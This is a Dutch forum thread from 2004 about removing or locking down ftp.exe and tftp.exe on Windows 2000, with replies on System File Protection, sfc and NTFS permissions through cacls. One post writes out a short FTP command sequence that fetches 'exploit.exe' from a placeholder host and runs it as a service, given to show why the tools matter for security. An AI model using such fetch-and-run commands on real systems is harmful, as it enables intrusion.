Toon posts:

[Win2k] Security FTP.EXE wil niet verwijderd worden

Pagina: 1
Acties:

Verwijderd

Topicstarter
om mijn eigen pc te beveiligen wil ik ftp.exe en tftp.exe weg gaan gooien, alleen als ik ze wil verwijderen uit mijn system32 mapje, komen ze naar enkele seconden terug... hoe kan ik dit voorkomen?

  • elevator
  • Registratie: December 2001
  • Niet online

elevator

Officieel moto fan :)

Deze bestanden worden beschermd als systeembestand zijnde - met 'sfc' op de commandline kan je hierin het een en ander tunen :)

  • G33rt
  • Registratie: Februari 2002
  • Laatst online: 22-06-2022
En wat hebben ftp en tftp met je beveiliging te maken? 'ftp' is gewoon een CLI ftp client...

  • Zwelgje
  • Registratie: November 2000
  • Laatst online: 20-01 19:37
sfc....

System File Checker

A wise man's life is based around fuck you


  • DiedX
  • Registratie: December 2000
  • Laatst online: 20:38
kan je niet beter op NTFS niveau alle rechten verwijderen?

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


  • DiedX
  • Registratie: December 2000
  • Laatst online: 20:38
G33rt schreef op 28 april 2004 @ 19:40:
En wat hebben ftp en tftp met je beveiliging te maken? 'ftp' is gewoon een CLI ftp client...
Uhhuh. Alleen maken exploits nogal eens gebruik van FTP om van buiten een trojan naar binnen te hengelen.

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


Verwijderd

Topicstarter
G33rt schreef op 28 april 2004 @ 19:40:
En wat hebben ftp en tftp met je beveiliging te maken? 'ftp' is gewoon een CLI ftp client...
lol ga eerst maar eens wat leren over win2k system security :)

  • G33rt
  • Registratie: Februari 2002
  • Laatst online: 22-06-2022
Wellicht kun je me verlichten? Ik zie niet in wat een ftp client op je commandline voor schade kan aanrichten namelijk :)

  • DiedX
  • Registratie: December 2000
  • Laatst online: 20:38
van buiten exploits naar binnen hengelen?

Microsoft heeft er eens een mooie paper over geschreven. Windows 2000 ging het toen over.

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


Verwijderd

Topicstarter
G33rt schreef op 28 april 2004 @ 19:43:
Wellicht kun je me verlichten? Ik zie niet in wat een ftp client op je commandline voor schade kan aanrichten namelijk :)
ftp
open x.x.x.x 21
user hack
me
get exploit.exe
get exploit.ini
quit

start exploit.exe -i
net start exploit

en hoepla je bent gehacked

  • elevator
  • Registratie: December 2001
  • Niet online

elevator

Officieel moto fan :)

CodeRed (als ik het goed heb) gebruikte TFTP om zichzelf te transporteren van ge-infecteerde server naar geinfecteerde server door via een 'IIS URL' de TFTP client aan te roepen :)

  • Zwelgje
  • Registratie: November 2000
  • Laatst online: 20-01 19:37
Verwijderd schreef op 28 april 2004 @ 19:42:
[...]


lol ga eerst maar eens wat leren over win2k system security :)
in die whitepapers hebben ze het ook niet over het verwijderen maar over het uitschakelen van ftp.exe (middels.... ntfs rechten)

A wise man's life is based around fuck you


Verwijderd

Topicstarter
nou ja maakt allemaal ook niks uit, hoe fix ik het vanuit me dos command line want ik zit via ftp op me server

edit: hoe zit dat met die rechten?

[ Voor 15% gewijzigd door Verwijderd op 28-04-2004 19:49 ]


  • Zwelgje
  • Registratie: November 2000
  • Laatst online: 20-01 19:37
Verwijderd schreef op 28 april 2004 @ 19:45:
[...]


ftp
open x.x.x.x 21
user hack
me
get exploit.exe
get exploit.ini
quit

start exploit.exe -i
net start exploit

en hoepla je bent gehacked
zou je dan ook het niet veel gevaarlijker iexplore.exe moeten verwijderen :?

en mozilla.exe ook

A wise man's life is based around fuck you


Verwijderd

Topicstarter
zwelgje schreef op 28 april 2004 @ 19:49:
[...]


zou je dan ook het niet veel gevaarlijker iexplore.exe moeten verwijderen :?

en mozilla.exe ook
om lekker off-topic te gaan mozilla own3d :D

on-topic: hoe zit dat nou met die rechten?

[ Voor 9% gewijzigd door Verwijderd op 28-04-2004 19:50 ]


  • DiedX
  • Registratie: December 2000
  • Laatst online: 20:38
cacls

cacls /? helpt je verder (tip: zoek op xcacls)

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

Pagina: 1